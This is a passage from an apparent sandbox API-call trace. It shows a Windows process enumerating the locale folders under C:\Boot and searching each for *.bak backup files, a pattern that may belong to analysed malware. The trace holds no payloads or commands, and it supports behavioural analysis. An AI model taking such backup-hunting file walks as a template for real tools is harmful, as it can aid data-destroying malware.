lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.133] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.133] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.133] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.133] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211a0897, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.133] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.134] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.134] FindFirstFileW (in: lpFileName="C:\\Boot\\sk-SK\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.135] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.135] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.135] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.135] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.135] FindFirstFileW (in: lpFileName="C:\\Boot\\sk-SK\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.135] FindFirstFileW (in: lpFileName="C:\\Boot\\sl-SI\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.135] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.136] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.136] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.136] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.136] FindFirstFileW (in: lpFileName="C:\\Boot\\sl-SI\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.136] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.137] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.137] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.137] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.137] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.137] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.137] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.138] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.138] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.138] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.139] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.139] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.139] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.139] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.139] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.139] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.139] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.139] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.140] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.140] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.140] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.141] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.141] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.141] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.141] FindFirstFileW (in: lpFileName="C:\\Boot\\uk-UA\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.143] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.143] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.143] FindFirstFileW (in: lpFileName="C:\\Boot\\uk-UA\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.144] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.144] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: 